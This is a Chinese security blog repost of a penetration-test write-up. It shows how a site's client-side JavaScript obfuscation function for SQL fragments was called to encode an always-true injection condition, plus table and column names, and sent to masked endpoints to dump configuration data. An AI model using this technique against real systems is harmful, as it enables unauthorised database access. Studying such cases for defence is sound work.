记某次测试翻阅海量js语句黑盒出sql注入

admin 2023年11月21日22:48:07评论21 views字数 982阅读3分16秒阅读模式

本篇文章为青山ya师傅实战经历分享

通过js发现加密sql语句后端进行处理

下面简要展示一下发现注入过程

翻阅到如下js代码记某次测试翻阅海量js语句黑盒出sql注入

jiamiSQL的代码如下所示

function jiamiSQL(sql){  var condtion = btoa(encodeURIComponent(sql));  if (condtion != undefined && condtion != "") {  var conditon1='';  var conditon2='';  for (var i = 0; i <condtion.length ; i++) {  if(i%2 ==0){  conditon2 += condtion[i];  }else{  conditon1 += condtion[i];}}  var fnailcondtion = conditon2+'_'+conditon1;  var fnailcondtion2 ='';  for (var j = fnailcondtion.length-1; j >=0 ; j--) {  fnailcondtion2 = fnailcondtion2+fnailcondtion[j];}  return fnailcondtion2;  }else{  return sql;}}

此处我直接在控制台调用js函数 jiamiSQL进行sql语句的加密

记某次测试翻阅海量js语句黑盒出sql注入
记某次测试翻阅海量js语句黑盒出sql注入

构造请求成功曝出数据

url : http://*********/********/map/zxsqllist

param : tiaojian==QwTxjl0ljlDyCwTyGySwTwTxjl0ljlDyCyC_=KIJAMQMAMEMUKIJ9MUKIJIJAMQMAMEMUMUK

&name=SYS_CONFIG
&jieguo=FFB1HkO0_VTZXlR9Q

tiaojian加密为jiamiSql("( 1 = 1 ) or ( 1 = 1 )")
name为数据表名
jieguo为字段名

jiamiSql("CONFIG_VALUE,CONFIG_NAME")

记某次测试翻阅海量js语句黑盒出sql注入

http://**********/commons/execstrSearch

param :
arr=jiamiSql(“语句”) 语句 格式’xxx’ &

&tableName=ZF_RZSQB 表明

&hideid=HYZK 字段

记某次测试翻阅海量js语句黑盒出sql注入

后续便可以利用sql注入深入

本篇文章为青山ya师傅实战案例分享

原文始发于微信公众号(梅苑安全学术):记某次测试翻阅海量js语句黑盒出sql注入

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年11月21日22:48:07
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   记某次测试翻阅海量js语句黑盒出sql注入https://cn-sec.com/archives/2227128.html

发表评论

匿名网友 填写信息